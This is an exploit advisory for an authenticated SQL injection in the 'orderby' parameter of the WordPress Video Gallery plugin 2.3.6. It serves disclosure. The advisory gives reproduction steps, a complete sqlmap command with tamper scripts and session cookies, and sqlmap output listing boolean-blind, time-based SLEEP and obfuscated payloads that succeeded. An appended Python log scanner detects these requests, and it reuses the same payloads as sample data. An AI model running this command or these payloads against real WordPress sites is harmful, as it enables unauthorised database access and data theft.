WordPress Video Gallery – YouTube Gallery And Vimeo Gallery 2.3.6 SQL Injection

# Exploit Title: WordPress Video Gallery – YouTube Gallery and Vimeo Gallery Plugin SQL Injection
# Date: 2024-07-05
# Exploit Author: tmrswrr
# Category : Webapps
# Vendor Homepage: https://total-soft.com/wp-video-gallery/
# Version: 2.3.6

1. **Access the Admin Panel:**
   - Navigate to the admin panel of your WordPress site.
   - Go to `TS Video Gallery` > `Create` > `Use Theme` and save it.
2. After saving, go back to TS Video Gallery and click the title: https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=asc
3. Look for the `orderby` parameter.

## SQLMAP COMMAND

```
python3 sqlmap.py -u "https://localhost/wordpress/wp-admin/admin.php?page=tsvg-admin&orderby=TS_VG_Title&order=desc" --batch --dbms=mysql --thread 10 --no-cast --random-agent -v 3 --tamper="between,randomcase,space2comment" --level=5 --risk=3 -p orderby --cookie="wordpress_logged_in_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|0b78b25e2683d7f381967019db82b3f3fd9b06f1524ec128af92a74fe7c68e8f; \
wordpress_sec_d31d6d9d0bfd834c03c5a471886561f0=admin|1720346143|BXq7Kk6kWE6W8OhFfxRfE1vpFt00m9gRiPafjJPDU1N|307f68044e4c2632757b13f86f770ceda3c9c7866a0b595b33a7a2f675224a15; \
wordpress_test_cookie=WP Cookie check; \
wp-settings-time-1=1720173805" --thread 10
```

## RESULT

```
sqlmap identified the following injection point(s) with a total of 1026 HTTP(s) requests:

Parameter: orderby (GET)
    Type: boolean-based blind
    Title: Boolean-based blind - Parameter replace (original value)
    Payload: page=tsvg-admin&orderby=(SELECT (CASE WHEN (1078=1078) THEN 0x54535f56475f5469746c65 ELSE (SELECT 2977 UNION SELECT 8545) END))&order=desc
    Vector: (SELECT (CASE WHEN ([INFERENCE]) THEN [ORIGVALUE] ELSE (SELECT [RANDNUM1] UNION SELECT [RANDNUM2]) END))

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: page=tsvg-admin&orderby=TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)&order=desc
    Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR])

[08:37:45] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[08:37:45] [INFO] the back-end DBMS is MySQL
[08:37:45] [PAYLOAD] (seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON/**/seLecT/**/9990)/**/End))
web application technology: Apache 2.4.54, PHP 8.0.23
back-end DBMS: MySQL >= 5.0.12 (MariaDB fork)
```
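
A defender-side check for the requests shown above, as an added example that is not part of the original advisory or the plugin's code: it scans access-log lines for `page=tsvg-admin` requests whose `orderby` is not a bare column identifier, which flags both the plain and the tamper-obfuscated payloads without keyword matching. The log lines, IP addresses and function names are constructed, and treating only `asc`/`desc` as valid for `order` is an assumption.

```python
import re
from urllib.parse import parse_qs, quote, urlsplit

# A sort column is a bare identifier and a direction is asc/desc (assumption);
# anything else in these parameters is treated as non-conforming.
IDENT = re.compile(r"[A-Za-z_][A-Za-z0-9_]{0,63}")
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def bad_sort_params(url):
    """Return [(name, value)] for non-conforming sort parameters on page=tsvg-admin."""
    parts = urlsplit(url)
    query = parse_qs(parts.query, keep_blank_values=True)  # percent-decodes values
    if not parts.path.endswith("/wp-admin/admin.php") or "tsvg-admin" not in query.get("page", []):
        return []
    bad = [("orderby", v) for v in query.get("orderby", []) if not IDENT.fullmatch(v)]
    bad += [("order", v) for v in query.get("order", []) if v.lower() not in ("asc", "desc")]
    return bad

def scan(log_lines):
    """Return [(client, name, value)] for each offending parameter in access-log lines."""
    hits = []
    for line in log_lines:
        m = REQUEST.match(line)
        if m:
            hits += [(m.group(1), name, value) for name, value in bad_sort_params(m.group(2))]
    return hits

# Constructed sample log (combined format, documentation IP addresses). The two
# non-benign orderby values are the payloads shown in the RESULT output above.
BASE = "/wordpress/wp-admin/admin.php?page=tsvg-admin&order=desc&orderby="
TIME_BASED = "TS_VG_Title AND (SELECT 6127 FROM (SELECT(SLEEP(5)))mIWx)"
TAMPERED = ("(seLecT/**/(cAsE/**/WHen/**/(veRSIOn()/**/liKe/**/0x254d61726961444225)"
            "/**/ThEN/**/0x54535f56475f5469746c65/**/elSE/**/(seLecT/**/6685/**/UNiON"
            "/**/seLecT/**/9990)/**/End))")

def log_line(ip, url):
    return f'{ip} - - [05/Jul/2024:08:37:45 +0000] "GET {url} HTTP/1.1" 200 5120'

SAMPLE_LOG = [
    log_line("192.0.2.10", BASE + "TS_VG_Title"),
    log_line("192.0.2.66", BASE + quote(TIME_BASED, safe="")),
    log_line("192.0.2.66", BASE + quote(TAMPERED, safe="")),
    log_line("192.0.2.10", "/wordpress/wp-admin/admin.php?page=other&orderby=" + quote("a b", safe="")),
]

if __name__ == "__main__":
    for client, name, value in scan(SAMPLE_LOG):
        print(f"{client} {name}={value}")
```

Because the check validates the shape of the value rather than searching for SQL keywords, the `randomcase` and `space2comment` rewrites seen in the `[PAYLOAD]` line do not change the outcome.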
